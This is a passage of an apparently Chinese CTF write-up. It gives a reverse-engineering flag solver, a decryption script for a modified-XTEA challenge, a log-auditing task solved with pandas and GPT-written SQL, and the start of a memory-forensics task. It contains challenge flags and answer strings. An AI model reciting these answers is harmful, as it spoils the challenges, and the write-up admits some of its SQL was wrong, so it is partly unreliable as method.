0x43e8c8], [0x2a, 0x440e30], [0x53, 0x4429b0], [0x14, 0x442828], [0xc, 0x43ef68], [0x45, 0x43c588], [0x76, 0x43da50], [0x2a, 0x43dcc0], [0x60, 0x43c240], [0x16, 0x43ac70], [9, 0x440ba8], [0x13, 0x440620], [0x2f, 0x43c390], [0x36, 0x4417a8], [0x67, 0x442588], [0x4d, 0x439290], [0x6d, 0x4421b8], [0x27, 0x43f230], [0x52, 0x43c2a8], [0x34, 0x43db60], [0x31, 0x440450], [0x68, 0x43a500], [0x55, 0x43a9d8], [0x6e, 0x441958], [0x6a, 0x43fda8], [0x36, 0x439998], [0x43, 0x4407c8], [0x70, 0x440cd0], [0x28, 0x43a2d0], [0x61, 0x43b7b0], [0x57, 0x43c520], [0x33, 0x442c48], [0x15, 0x43d828], [0x41, 0x43da90], [0x7b, 0x43d0c0], [0x69, 0x43d120], [0, 0x440c78], [0x59, 0x440ba8], [0x26, 0x439788], [0x7d, 0x43d0c8], [0x15, 0x43d528], [3, 0x43b940], [0x5a, 0x43e3f0], [6, 0x43d4e8], [0x25, 0x440178], [0x53, 0x439e08], [0x44, 0x43a888], [1, 0x43a7c0], [0x1c, 0x43a7d0], [0x11, 0x43cf50], [4, 0x4422c0], [0x10, 0x43e9a0], [0x18, 0x43c7f8], [0x46, 0x439480], [0xb, 0x43cd38], [0x69, 0x43d4d0], [9, 0x441fc8], [4, 0x43fd68], [0x19, 0x43a698], [0x5d, 0x439ff0], [0x18, 0x441358], [0x32, 0x43d7b0], [0x60, 0x43d100], [0x7a, 0x4420f0], [6, 0x439f78], [0xf, 0x439bb0], [0x49, 0x43cf28], [0x65, 0x43f670], [0x41, 0x43a240], [0x46, 0x43cf48], [0x48, 0x442398], [0x2e, 0x43aff8], [0x1f, 0x439888], [0x28, 0x439290], [0x71, 0x43f808], [0x6a, 0x43d2d8], [0x24, 0x43c858], [4, 0x43cda8], [9, 0x439858], [0x54, 0x43a510], [0x75, 0x43fe98], [0x22, 0x440970], [0x4c, 0x43c6b0], [0x15, 0x439608], [0x6f, 0x439b50], [0x56, 0x440800], [0x4d, 0x4411a8], [0x30, 0x43bd30], [0x50, 0x439c20], [0x4b, 0x43b7f8], [0x7b, 0x43a080], [0xf, 0x43e1e8], [0xc, 0x43bc08], [0x3d, 0x43a1b8], [0x3f, 0x43ecb8], [0x21, 0x43b7f0], [0x3f, 0x442138], [0x13, 0x4405d0], [0x3b, 0x43b658], [0x2e, 0x43b228], [0x3c, 0x43d330], [0x5f, 0x43c8b0], [0x30, 0x43b030], [0x39, 0x439bc0], [0x3f, 0x43c1d8], [0x29, 0x43bfa0], [0x77, 0x4413b0], [0xc, 0x43f068], [0x3f, 0x43d8a8], [0x38, 0x440a10], [0x2e, 0x43baf8], [0x61, 0x43c4c8], [0x57, 0x43a4d8], [0x17, 0x442990], [0x6d, 0x4421f0], [0x29, 0x43a790], [0x69, 0x43dce0], [0x2b, 0x43aa88], [0x2e, 0x43b9b0], [0x79, 0x43bb70], [0x39, 0x43e268], [0x6b, 0x440ac8], [0x4d, 0x441430], [0x10, 0x43ddc8], [0x4f, 0x4406f8], [0x34, 0x441578], [0x28, 0x43dac8], [0x7a, 0x43a018], [0x5f, 0x43fa30], [0x4b, 0x43bc70], [0x5b, 0x43cea0], [0x6b, 0x441e40], [0x5e, 0x43c1d8], [0x72, 0x43f950], [0x31, 0x441fa0], [0x11, 0x4426b0], [0x30, 0x43c458], [0x22, 0x440030], [0xf, 0x43d770], [0x2f, 0x43e218], [0x7d, 0x43d4f0], [0x5d, 0x43f2b8], [0x26, 0x43cf68], [0x3f, 0x43abe0], [0x1c, 0x440c00], [0x34, 0x43d330], [0x2d, 0x441c80], [0x38, 0x43b678], [0x2d, 0x440220], [0x53, 0x43d410], [0x44, 0x43b148], [1, 0x43d310], [0x41, 0x441ca0], [0x46, 0x43e0d8], [0x74, 0x43cd78], [0x69, 0x440248], [0x2d, 0x440790], [0x46, 0x43a748], [0x4d, 0x43cea0], [0x62, 0x441720], [0, 0x43b658], [0x3b, 0x43ca58], [0x2f, 0x440000], [0x45, 0x440ef8], [0x12, 0x43f470], [0x52, 0x439b40], [0x22, 0x43a3a0], [0x32, 0x43e348], [0x2e, 0x440fc8], [0x37, 0x43b3c8], [0x5c, 0x442600], [0x20, 0x43eee8], [0x6e, 0x442720], [0x67, 0x4423a0], [0x65, 0x439bb0], [8, 0x4394a0], [0x23, 0x43b2e0], [0x37, 0x441e58], [0x51, 0x439ae0], [0x2b, 0x43dcc0], [0x6a, 0x441310], [0x60, 0x442258], [0x24, 0x43e7f0], [0x78, 0x43ed10], [99, 0x43a008], [0x3d, 0x442530], [0x53, 0x43cd10], [0x21, 0x440770], [0x72, 0x43a9a0], [0x25, 0x4403d0], [0x65, 0x439b90], [0x32, 0x43f710], [0x41, 0x441db0], [99, 0x43b500], [0x36, 0x43b0a8], [0x67, 0x43f150], [0x44, 0x439e38], [0x50, 0x43a2a8], [0x54, 0x43c7f0], [0x13, 0x440038], [0x75, 0x43c0e8], [8, 0x442920], [5, 0x441460], [0x24, 0x43cb60], [0x1c, 0x43d588], [0x47, 0x43a010], [0x62, 0x43e240], [0x52, 0x43af78], [0x45, 0x43c530], [99, 0x441240], [0x1d, 0x43b058], [0x66, 0x440930], [0x4e, 0x4395f0], [0x60, 0x43b168], [0x61, 0x43cb68], [0x20, 0x441db8], [0x1f, 0x4407a8], [0x2f, 0x43d388], [0x4c, 0x441738], [0x44, 0x43bfb0], [0x6d, 0x43d560], [2, 0x43d458], [0x22, 0x43cb90], [0x41, 0x4419e0], [0x3c, 0x43a1b8], [0x43, 0x43da28], [0x77, 0x43aaa8], [0x78, 0x442890], [100, 0x43d0f8], [0x39, 0x43e5d8], [0x1f, 0x43c1d8], [0x2e, 0x43bd10], [0x43, 0x43e3c0], [0x33, 0x4412b8], [0x2c, 0x43e910], [7, 0x43be70], [0x16, 0x43a0a0], [0x6b, 0x43e5f8], [0xf, 0x43ab70], [0x3a, 0x43bbf8], [0x60, 0x43a3b8], [0x77, 0x4419e8], [0x55, 0x43a520], [0x56, 0x441000], [4, 0x43ba88], [0x65, 0x43adf0], [0xf, 0x441c78], [0x2d, 0x43e6c0], [0x6d, 0x440c78], [0x7c, 0x43d6e8], [0x4b, 0x439230], [0x57, 0x440ad8], [0x69, 0x43da50], [9, 0x43e3a8], [0x3b, 0x441060], [0x66, 0x43f5d0], [0xf, 0x43dbb0], [0x5b, 0x43e0d0], [0x76, 0x4399f8], [0x22, 0x43e930], [0x5b, 0x43bfe0], [0x60, 0x43b940], [0x55, 0x441990], [0x79, 0x43f208], [0x54, 0x439508], [0x5d, 0x43dd50], [0x77, 0x43f198], [0xf, 0x43c268], [0x67, 0x43c728], [0x44, 0x43b2e8], [0x62, 0x441028], [0x53, 0x43c918], [0x51, 0x43dde8], [0x32, 0x43a3d8], [0x3e, 0x43df78], [0x62, 0x43dff0], [0x39, 0x4417d0], [3, 0x4426c0], [0x43, 0x43bd58], [0x56, 0x43b2e8], [0x4e, 0x43cb38], [9, 0x440d00], [0x2d, 0x43c080], [0x65, 0x43d960], [0x32, 0x43adf0], [0x70, 0x43cdb8], [100, 0x43cc40], [0x7a, 0x43c8a0], [0x57, 0x43ea20], [0x2c, 0x441600], [0x3a, 0x43bd18], [9, 0x43dc30], [0x17, 0x439ac0], [0x14, 0x43e5f8], [0x4d, 0x440458], [0x71, 0x442460], [99, 0x43f188], [0x23, 0x43b9b0], [0xb, 0x43d830], [4, 0x441e48], [0x1c, 0x43c068], [0x44, 0x43e898], [0x4e, 0x43d2f8], [0x3a, 0x43ecd8], [0x76, 0x43d490], [0x57, 0x43a680], [0x1e, 0x43b860], [0x71, 0x439300], [0x17, 0x4408c8], [0x43, 0x43d798], [0x13, 0x440b08], [0x58, 0x43b0f0], [0x3d, 0x43c0f0], [0x30, 0x442860], [0x5a, 0x4424a0], [0x75, 0x43c550], [0x16, 0x439288], [100, 0x43b050], [0x50, 0x43fa38], [0x59, 0x43fb50], [0x2e, 0x439180], [0x35, 0x440fe8], [0x45, 0x43c010], [0x5a, 0x439d58], [3, 0x43cd58], [0x27, 0x43d128], [0x5a, 0x441b30], [10, 0x43ae20], [0x2e, 0x440530], [0x25, 0x43ced0], [0xd, 0x4393d8], [0x30, 0x43a480], [0x3f, 0x442198], [0x5a, 0x442690], [0x47, 0x43c710], [7, 0x43aac0], [0x29, 0x441728], [0x26, 0x442cb0], [0x35, 0x43eca0], [0x6e, 0x440ab8], [0x4c, 0x43f5b0], [0x3b, 0x43b128], [0x13, 0x43d708], [0x68, 0x43e460], [0x35, 0x43c490], [0x56, 0x4406c0], [0x38, 0x442690], [0x11, 0x43a120], [0x5f, 0x43d410], [0x18, 0x441a20], [0x36, 0x439540], [0x58, 0x441ea8], [0x34, 0x440ad0], [0x77, 0x43a0d8], [0x1b, 0x43d090], [0x3d, 0x440aa0], [0xe, 0x439498], [0x68, 0x43a7a0], [0x52, 0x43d918], [0x3d, 0x43e938], [0x72, 0x43fa10], [7, 0x43b130], [0x1d, 0x43d250], [0x5b, 0x43c3e0], [0x61, 0x43d678], [0x76, 0x43d040], [0x45, 0x43d6c0], [0x4f, 0x43a448], [0x47, 0x43c0b8], [0x5f, 0x43cca8], [0x4b, 0x43c470], [0x40, 0x43d210], [6, 0x43a0d0], [0x7a, 0x43ed80], [0x55, 0x43f2e0], [0x3e, 0x4399f0], [0x34, 0x43b6e8], [0x5c, 0x43b120], [0x27, 0x43e510], [0x40, 0x43c108], [0x5c, 0x43b148], [0x39, 0x43aab8], [0x47, 0x43a918], [0x50, 0x43b9a0], [1, 0x439c58], [0x76, 0x442310], [0x43, 0x43f128], [0x59, 0x442388], [0x23, 0x43f890], [0x29, 0x43f650], [6, 0x441cd8], [5, 0x439378], [0x6b, 0x43dfa0], [0x66, 0x442410], [0x65, 0x43cce0], [0x50, 0x43a560], [0xe, 0x43a948], [0xb, 0x440378], [0x3a, 0x43f348], [0x2d, 0x43b370], [0x2d, 0x43ec30], [0x41, 0x43fe98], [0x26, 0x43b6d0], [0x4f, 0x43ca88], [0x71, 0x43b820], [0x12, 0x43b958], [0x70, 0x4422c8], [0x16, 0x43c7e0], [0x34, 0x43b4b0], [0x1e, 0x4390c8], [0xf, 0x43efe8], [10, 0x43e6e0], [0x59, 0x442338], [0x7c, 0x43d2d0], [0x3c, 0x4412c8], [0x1c, 0x43ebf8], [0x36, 0x441b48], [0x2d, 0x43d9c0], [0x41, 0x43b358], [0x56, 0x439e50], [0x2c, 0x43aab8], [0x3a, 0x43b188], [0x4d, 0x43d5e8], [0x58, 0x43b060], [0x53, 0x43cf20], [100, 0x441fb8], [7, 0x43a5b8], [0x53, 0x441b80], [0x4d, 0x4414d0], [7, 0x43ddf8], [0x1a, 0x4406d8], [0x3a, 0x43dd78], [0x38, 0x43c560], [0x10, 0x4405d0], [6, 0x43ee00], [6, 0x440e20], [0x37, 0x43fde0], [0x11, 0x43a530], [0x78, 0x439880], [0x24, 0x4400b0], [0x34, 0x43af70], [0, 0x43bf68], [0x53, 0x442010], [0x79, 0x442110], [0x21, 0x4422d0], [0x10, 0x43ce28], [0x45, 0x43b2c8], [0x11, 0x43e630], [0x6d, 0x43cdf0], [0x21, 0x43d978], [0x17, 0x440c50], [0x5e, 0x4394f8], [0x1b, 0x43e810], [0x6b, 0x441348], [0x7c, 0x4428d0], [0x32, 0x43aaa0], [0x6b, 0x43d818], [0x22, 0x43ba60], [0x28, 0x43cea8], [0x30, 0x43f8c8], [0x30, 0x441f48], [0x5c, 0x43e130], [0x5b, 0x43f200], [0xe, 0x43eba8], [0x41, 0x4410c0], [10, 0x442208], [0x33, 0x43a888], [0x4b, 0x43ef60], [8, 0x43a1d0], [9, 0x43af10], [4, 0x43a750], [0x23, 0x43bc68], [0x31, 0x43b318], [0x62, 0x440a10], [0x59, 0x442348], [0x15, 0x43eba8], [3, 0x43fc20], [0x22, 0x442b88], [0x1c, 0x4405d0], [9, 0x442bd0], [0x43, 0x4396d0], [0x51, 0x439df0], [0x4b, 0x43e0a0], [0x1c, 0x43bdc8], [0x59, 0x440f20], [0xd, 0x43b940], [0x67, 0x43ae80], [7, 0x43d8c8], [0x6b, 0x43ce00], [0x40, 0x43e288], [0x6a, 0x43cdb0], [0x2e, 0x43c9f0], [0x42, 0x43dc30], [0x79, 0x43c730], [0x71, 0x43c078], [0x40, 0x43f3f8], [0x2b, 0x43fa18], [0x6e, 0x43dc40], [0x6f, 0x440360], [9, 0x43deb8], [0xf, 0x43d3b8], [9, 0x4421a8], [0x23, 0x4391a8], [0x4c, 0x440bc0], [0x27, 0x43c1f8], [0x23, 0x43dd80], [4, 0x43d298], [0x67, 0x439ae0], [0x48, 0x439ae8], [0x67, 0x4415e8], [0x6d, 0x43dbb8], [0x5c, 0x4396d0], [0x56, 0x43e758], [0x3e, 0x43b030], [0x61, 0x439a00], [0x32, 0x43a3b8], [0x52, 0x442460], [0x6f, 0x442340], [0x60, 0x439c48], [0x53, 0x43fc10], [0x14, 0x43af98], [0x5d, 0x43aaf0], [0x75, 0x441480], [0x15, 0x43dfb8], [0x11, 0x43e0c8], [0x51, 0x4400b0], [0x50, 0x442408], [0x6b, 0x43bfa8], [0x4c, 0x440018], [3, 0x441078], [3, 0x43a0c8], [0x23, 0x4410c0], [0x77, 0x442a90], [0x23, 0x43d348], [0x6d, 0x43fdd8], [0x58, 0x441038], [0x10, 0x439190], [0x26, 0x43b3a8], [0x39, 0x43bdb0], [0x77, 0x439d78], [0x3f, 0x43e758], [0xd, 0x43d648], [0x74, 0x43be68], [100, 0x439d70], [0x3f, 0x43cd58], [0x66, 0x4406a8], [0x60, 0x439b30], [0x4c, 0x43aa08], [0x75, 0x43cc10], [0x66, 0x43a940], [0x40, 0x43b2e0], [0xc, 0x442538], [0x1f, 0x43b7a0], [0x1c, 0x440220], [0x6e, 0x43d2a8], [0x30, 0x439f20], [0x25, 0x43fad8], [0x53, 0x4412b0], [0x6a, 0x43efe0], [0x26, 0x43aa78], [5, 0x43da10], [2, 0x4401f8], [0x2d, 0x439dc0], [8, 0x4413e0], [0x6e, 0x440158], [0x67, 0x43dff0], [0x77, 0x439218], [0x7e, 0x440950], [0x6c, 0x440610], [0x4a, 0x43db58], [0x5c, 0x43bda0], [0x4c, 0x439ab0], [0x36, 0x43da80], [0x45, 0x4426a8], [99, 0x43c6f0], [0x78, 0x43c6b8], [0x1e, 0x43a988], [0x4d, 0x4402a8], [0x49, 0x43b1b8], [0x16, 0x43a180], [0x2e, 0x43fd70], [0x3d, 0x442188], [0x58, 0x43ffc8], [0x2c, 0x43ae48], [0x4b, 0x442aa0], [0x1d, 0x43b510], [0x75, 0x4426e0], [0x44, 0x439ea8], [0xd, 0x43ccd0], [0x6e, 0x441770], [0x3b, 0x442c50], [9, 0x442ab0], [0x31, 0x43c0f8], [0x2e, 0x43f078], [0x37, 0x441ad0], [0x1d, 0x43c628], [0x22, 0x4416d0], [0x67, 0x441090], [0x52, 0x4390f0], [0x77, 0x43a410], [0x36, 0x43f308], [0x6f, 0x439608], [0x53, 0x441c60], [0x71, 0x43bb90], [0x75, 0x43d118], [0x40, 0x43c108], [0x70, 0x4428c8], [0x72, 0x43e918], [0xf, 0x442968], [0x6f, 0x43f128], [0x23, 0x43a408], [0x33, 0x4396d0], [0x67, 0x440640], [0x48, 0x43d348], [0x7e, 0x43ed48], [0x2b, 0x43f130], [0x52, 0x43fa08], [0, 0x43b240], [0x34, 0x4393a8], [0x1c, 0x43ced8], [0x58, 0x43c0c0], [0x15, 0x441f78], [0x30, 0x43ac90], [0x2f, 0x43fc40], [0x2b, 0x441910], [0x48, 0x440138], [0x62, 0x441a70], [0x4d, 0x43ee88], [0x3d, 0x441c80], [0x30, 0x43bd38], [0x19, 0x43e9d0], [0x7b, 0x43bc30], [0x6a, 0x43a070], [0x76, 0x442538], [0, 0x43c038], [0x6d, 0x43fdd0], [0x4b, 0x43ebe0], [0x2e, 0x43a530], [0x4c, 0x43c470], [0x27, 0x43e220], [0x2a, 0x441ec0], [0x52, 0x43bee8], [0x71, 0x43dbf0], [0x4c, 0x43b148], [0xe, 0x43fbc8], [0x55, 0x43b2d0], [6, 0x43ce90], [2, 0x440240], [0x73, 0x43c0e8], [100, 0x43b978], [0x4a, 0x43e4c8], [0x7e, 0x439e68], [0xf, 0x43cfa8], [0x38, 0x441000], [0x41, 0x441528], [0x2d, 0x43a638], [0x51, 0x4417e0], [0x13, 0x439200], [0x74, 0x4402e0], [0x7b, 0x43df90], [0x6e, 0x4398a0], [0x55, 0x43d6a0], [0x59, 0x43f9c8], [0x43, 0x43b8f0], [6, 0x440d08], [0x41, 0x43d7b0], [0x4a, 0x442ba0], [0x49, 0x4397b0], [6, 0x43eb58], [0x41, 0x43d658], [0x30, 0x43c030], [0x74, 0x442490], [0x11, 0x43e080], [0x73, 0x43c9b0], [0x3a, 0x441ff0], [0xd, 0x43fda8], [0x12, 0x43c800], [0x38, 0x43dc18], [0x46, 0x43baf8], [0x2a, 0x43ac78], [0x67, 0x43ffc0], [0x6b, 0x43b5a8], [0x5f, 0x442838], [0x36, 0x439a20], [0x3f, 0x440cf8], [0x46, 0x43e8c8], [0x62, 0x43e2c8], [0x1d, 0x440fd8], [1, 0x4421a0], [0x4b, 0x43aa00], [0x32, 0x43c960], [0x18, 0x43f900], [0x5e, 0x441170], [0x67, 0x43fa88], [0x2b, 0x43f610], [7, 0x43c910], [5, 0x439b50], [0x2e, 0x43eee8], [0x15, 0x43a898], [0xe, 0x43bf70], [0x71, 0x440108], [0x27, 0x441bc8], [0x4b, 0x4398b8], [0x31, 0x43f198], [0x60, 0x43cf78], [0x53, 0x43ed78], [0x7e, 0x43a138], [0x1c, 0x43c120], [0x5a, 0x43c5e8], [0x3e, 0x43b468], [0x10, 0x43af28], [0x18, 0x43c808], [0x6d, 0x441900], [0x36, 0x4413a0], [0x1a, 0x43b8b8], [0xb, 0x442370], [0x77, 0x43d580], [0x31, 0x43e590], [8, 0x43d800], [0x19, 0x442050], [0x14, 0x43d310], [0x33, 0x43a708], [0x61, 0x4419f8], [4, 0x439e08], [0x3c, 0x442b30], [0x77, 0x43ac38], [0x23, 0x43a2f0], [0, 0x4400d8], [0x62, 0x43e650], [0x20, 0x43f220], [0x44, 0x43ca60], [0x43, 0x43ab58], [0x58, 0x4396e8], [0x13, 0x43cbb0], [0x56, 0x43c758], [0x32, 0x441288], [0x31, 0x43ec20], [0x72, 0x43a600], [0x46, 0x43b558], [0x23, 0x43ea80], [0x57, 0x43df88], [0x38, 0x4404b0], [0x3a, 0x440828], [0x49, 0x43eb00], [0x43, 0x439a78], [0x65, 0x43dc58], [0x18, 0x43e048], [0x43, 0x442768], [0x40, 0x43d8f8], [0x69, 0x43afa0], [0x24, 0x43aa08], [0x38, 0x43dcf0], [0x69, 0x441bf0], [0xb, 0x4404d8], [0x42, 0x4407e0], [0x2e, 0x43cab8], [0x32, 0x43dd28], [0x13, 0x43b120], [0x53, 0x441798], [0x67, 0x43f2c0], [0x1d, 0x43fd80], [0x73, 0x43a498], [0x3e, 0x43ac38], [0x73, 0x43afa0], [9, 0x43c078], [0x33, 0x43a020], [6, 0x43c8c8], [0x54, 0x43fd98], [0x21, 0x440bc0], [0x54, 0x441888], [0x14, 0x43d348], [0x48, 0x4404c0], [0x74, 0x43e458], [0x78, 0x43dbc0], [0x19, 0x43e0c0], [0x34, 0x43fad8], [0x23, 0x4411e0], [0x1a, 0x440818], [3, 0x43d830], [0x29, 0x441840], [0x2a, 0x43caa8], [0x5e, 0x43d930], [0x30, 0x441b60], [0x14, 0x441270], [0x5d, 0x43a648], [0x13, 0x441060], [0x1e, 0x43a2d8], [0x79, 0x43d188], [0x70, 0x43e610], [0x4b, 0x43d250], [0x54, 0x43cf18], [0x72, 0x43f8c8], [0x30, 0x43ece0], [0xe, 0x440bd0], [99, 0x43ff68], [0x24, 0x43e488], [0x4d, 0x43a200], [0x38, 0x43e210], [0xb, 0x43e150], [0x6e, 0x440148], [0x4d, 0x441e10], [0x74, 0x440318], [0x6c, 0x43c188], [0x37, 0x43c620], [0x1e, 0x43f358], [0x4f, 0x43ac10], [0x7d, 0x43ec68], [0x4f, 0x43d350], [0x49, 0x441a38], [0x71, 0x439fd0], [0, 0x43c2a8], [8, 0x43d5b8], [0x40, 0x43be00], [0, 0x43c5c0], [0x1e, 0x43ee90], [0x42, 0x441910], [0x4b, 0x43b850], [0xd, 0x43eef0], [0x35, 0x4418a0], [0x52, 0x442300], [0x23, 0x43f768], [0x33, 0x440408], [0x36, 0x43f168], [0x5f, 0x43a570], [0x1b, 0x43fc70], [0x4d, 0x43b290], [0x1d, 0x43efe8], [0x5f, 0x440210], [0x75, 0x43b2b0], [0x55, 0x43bc80], [0x1d, 0x441928], [0x57, 0x441f58], [0x53, 0x43f850] ]

s = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&?@_~-"
length = 48
flag=''
idx,i=0,0
temp=b''

def find_flag(lst, flag, idx, i, length, temp) :                                                         
    for j in s:
        if ord(j) * 2 + idx < len(lst):                                                      
            flag2 = None
            if (ord(j) - 5) == lst[ord(j) + idx][0]:
                flag2 = j
                temp2 = temp + (~(ord(j) + 1) & 0xff).to_bytes(1, byteorder='big')
            elif (ord(j) + 5) == lst[ord(j) + idx][0]:
                flag2 = j
                temp2 = temp + (~(ord(j) - 1) & 0xff).to_bytes(1, byteorder='big')

            if flag2 is not None:
                new_idx = (lst[ord(j) + idx][1] - 0x439078) // 8
                find_flag(lst, flag + flag2, new_idx, i + 1, length, temp2)

            if i == length:
                    hash_object = hashlib.sha1()
                    hash_object.update(temp)
                    sha1_hash = hash_object.hexdigest()
                    if (sha1_hash == "dc0562f86bec0a38508e704aa9faa347101e1fdb"):
                        print(flag)
                    return flag

find_flag(lst, flag, idx, i, length, temp)

#Somet1mes_ch0ice_i5_more_import@nt_tHan_effort~!

BabyCPP

魔改xtea+异或+加法+异或

text_79下是主要逻辑

跟进可以看到函数的操作,然后重命名函数

xtea对循环次数和位移进行了魔改

从这里可以动调提出异或和加法的表

from ctypes import *
import libnum

enc= [0x33, 0xB2, 0x49, 0x8C, 0x39, 0xDD, 0x60, 0x5F, 0x5F, 0x77,
      0x72, 0xAB, 0x38, 0xD9, 0xED, 0xE7, 0xF3, 0xF0, 0x66, 0x67,
      0x16, 0xC8, 0x53, 0x80, 0x71, 0xB2, 0xFA, 0x5E, 0x7C, 0x2B,
      0xBB, 0x0B, 0xE5, 0x88, 0x82, 0x0B, 0x06, 0x8C, 0x8D, 0xAD,
      0x47, 0xB5, 0x85, 0xBB, 0x06, 0x8D, 0x01, 0x2B]
xor1= [238, 23, 128, 227, 23, 10, 229, 83, 51, 158, 46, 29, 5, 111, 180, 81, 154, 54, 92, 189, 8, 162, 52, 163, 101, 89, 98, 174, 52, 13, 208, 188, 48, 129, 235, 140, 101, 54, 253, 126, 74, 30, 16, 39, 221, 90, 164, 11]
xor2=[59, 59, 62, 232, 44, 114, 46, 199, 199, 222, 18, 209, 145, 52, 97, 89, 29, 19, 129, 212, 135, 103, 235, 115, 124, 88, 164, 106, 152, 151, 31, 131, 45, 163, 144, 118, 219, 240, 24, 137, 141, 226, 167, 46, 68, 188, 76, 108]
plus=[86, 45, 248, 66, 127, 194, 38, 99, 131, 50, 196, 63, 185, 168, 127, 201, 67, 34, 198, 137, 107, 93, 239, 46, 232, 32, 205, 191, 132, 240, 123, 77, 210, 63, 79, 183, 149, 240, 205, 150, 87, 86, 67, 241, 107, 1, 198, 54]
enc2=[]
for i in range(48):
    temp = (enc[i] ^ xor1[i])&0xff
    temp =(temp - plus[i])&0xff
    temp =(temp ^ xor2[i])&0xff
    enc2.append(temp)
print(enc2)

def decrypt( v, k):
    v0 = v[0]
    v1 = v[1]
    delta = 0xDEADBEEF
    x = delta * 256
    for i in range(256):
        x -= delta
        x = x & 0xFFFFFFFF
        v1 -= (((v0 << 6) ^ (v0 >> 3)) + v0) ^ (x + k[(x >> 11) & 3])
        v1 = v1 & 0xFFFFFFFF
        v0 -= (((v1 << 2) ^ (v1 >> 7)) + v1) ^ (x + k[x & 3])
        v0 = v0 & 0xFFFFFFFF
    v[0] = v0
    v[1] = v1
    return v
if __name__ == '__main__':
    flag=b""
    l=[0xc5ef43bc,0x6e716783,0xa68a692e,0xb4bb3a15,0x85f5b73b,0x86936a34,0x5b6f9350,0xe9efa15c,0xa68a692e,0xb4bb3a15,0x85f5b73b,0x86936a34]
    for i in range(0,12,2):
        a = [l[i],l[i+1]]
        #print(a)
        k = [0x67452301,0xEFCDAB89,0x98BADCFE,0x10325476]
        res = decrypt( a, k)
        flag += libnum.n2s(res[0])[::-1]
        flag += libnum.n2s(res[1])[::-1]
    print(flag)

#b'df8d8ab87c22a396041f9bde6a40c4987c22a396041f9bde'

MISC

2024签到题

在标题里

数据安全-easy_tables

阅读实例相关内容,发现就是要找出不符合说明的操作,先用脚本将内容转为符合的格式,手动看一下发现有的数据缺失,手动补齐即可

import pandas as pd
import re

users = pd.read_csv("users.csv")
permissions = pd.read_csv("permissions.csv")
tables = pd.read_csv("tables.csv")
actionlog = pd.read_csv("actionlog.csv")

invalid_operations = []

for index, row in actionlog.iterrows():
    username = row['账号']

    user_info = users[users['账号'] == username]
    if user_info.empty:
        invalid_operations.append(f"用户{username}在users.csv中未找到")
        continue

    user_id = user_info.iloc[0]['编号']
    permission_group_id = user_info.iloc[0]['所属权限组编号']

    permission_info = permissions[permissions['编号'] == permission_group_id]
    if permission_info.empty:
        invalid_operations.append(f"用户{username}的权限组{permission_group_id}在permissions.csv中未找到")
        continue

    permission_group_name = permission_info.iloc[0]['权限组名']
    allowed_operations = set(permission_info.iloc[0]['可操作权限'].split(','))
    allowed_tables = set(map(int, permission_info.iloc[0]['可操作表编号'].split(',')))

    match = re.search(r'(?:from|into|update)\s+([a-zA-Z0-9_]+)', row['执行操作'], flags=re.IGNORECASE)
    table_name = match.group(1) if match else None

    if table_name is not None:
        table_info = tables[tables['表名'] == table_name]
        if table_info.empty:
            invalid_operations.append(f"表{table_name}在tables.csv中未找到")
            continue

        table_time_periods = table_info.iloc[0]['可操作时间段(时:分:秒)'].split(',')
        operation_time = pd.to_datetime(row['操作时间']).time()

        valid_time = any(
            start_time <= operation_time <= end_time for period in table_time_periods
            for start_time, end_time in [map(lambda x: pd.to_datetime(x).time(), period.split('~'))]
        )

        if not valid_time:
            invalid_operations.append(f"用户{username}在表{table_name}的操作时间不在允许范围内")
            continue

    operation_type = row['执行操作'].split()[0].lower()
    if operation_type not in allowed_operations or table_name not in allowed_tables:
        log_event_id = index + 1  
        result = f"{user_id}_{permission_group_id}_{table_name}_{log_event_id}"
        invalid_operations.append(result)

if invalid_operations:
    for result in invalid_operations:
        print(result)
else:
    print("所有操作合规。")

之后手搓将table名替换为对应编号,之后利用数据库进行查询查找违规操作(也就是说明中的几种情况)

对于第一种情况:不存在的账号执⾏了操作

这里是大体看了一眼发现几乎没有违规的,手搓查找username,就一直看找到2个

0_0_0_6810,0_0_0_8377

对于第二种情况:账号对其不可操作的表执⾏了操作

手搓,还是筛一下直接看

6_14_91_6786

对于第三种情况:账号对表执⾏了不属于其权限的操作

对原来表处理一下便于查询,之后gpt跑一下

SELECT
  u.`编号` AS UserID,
  u.`账号` AS UserAccount,
  a.`执行操作` AS ExecutedOperation
FROM
  users u
JOIN
  actionlog a ON u.`账号` = a.`账号`
WHERE
  a.`账号` IN (
    SELECT DISTINCT p.`账号`
    FROM permissions p
    JOIN (SELECT 0 AS digit UNION ALL SELECT 1 UNION ALL SELECT 2 UNION ALL SELECT 3) n
    ON LENGTH(p.`可操作权限`) - LENGTH(REPLACE(p.`可操作权限`, ',', '')) >= n.digit
    WHERE EXISTS (
      SELECT 1
      FROM permissions subp
      WHERE subp.`账号` = p.`账号`
      AND a.`执行操作` LIKE CONCAT('%', SUBSTRING_INDEX(SUBSTRING_INDEX(subp.`可操作权限`, ',', n.digit+1), ',', -1), '%')
    )
  );
7_64_69_3448,9_18_61_5681,30_87_36_235

对于第四种情况:账号不在规定时间段内执⾏操作

这边gpt跑出来的SQL语句查询的不对,手动筛选一下弄成新的csv导入为新表便于查询,之后继续gpt

WITH RankedTables AS (
    SELECT
        t.编号 AS tables编号,
        u.编号 AS 用户编号,
        u.所属权限组编号,
        c.可操作表编号,
        ROW_NUMBER() OVER (PARTITION BY t.编号 ORDER BY t.操作时间 DESC) AS RowNum
    FROM
        time t
    JOIN
        users u ON t.账号 = u.账号
    JOIN
        permissions p ON u.所属权限组编号 = p.编号
    JOIN
        tables tbl ON FIND_IN_SET(tbl.编号, p.可操作表编号) > 0
    LEFT JOIN
        actionlog c ON tbl.表名 = c.表名 AND (
            TIME(t.操作时间) NOT BETWEEN SUBSTRING_INDEX(tbl.`可操作时间段(时:分:秒)`, '~', 1) AND SUBSTRING_INDEX(tbl.`可操作时间段(时:分:秒)`, '~', -1)
            OR TIME(t.操作时间) IS NULL
        )
)
SELECT
    tables编号,
    用户编号,
    所属权限组编号,
    可操作表编号
FROM
    RankedTables
WHERE
    RowNum = 1;
31_76_85_9617,49_37_30_8295,75_15_43_8461,79_3_15_9011

整合一下

0_0_0_6810,0_0_0_8377,6_14_91_6786,7_64_69_3448,9_18_61_5681,30_87_36_235,31_76_85_9617,49_37_30_8295,75_15_43_8461,79_3_15_9011

Cyber处理一下

easy_rawraw

题目除了镜像还有一个加密压缩包,我们先丢进Passwarekit里看一下:

分析出了密码,但不是secret压缩包的

volatility分析:

mft恢复结果有这个,我们批量搜pass

提取出来有一张图片,我们binwalk分离得到另外一个有pass.txt​的压缩包

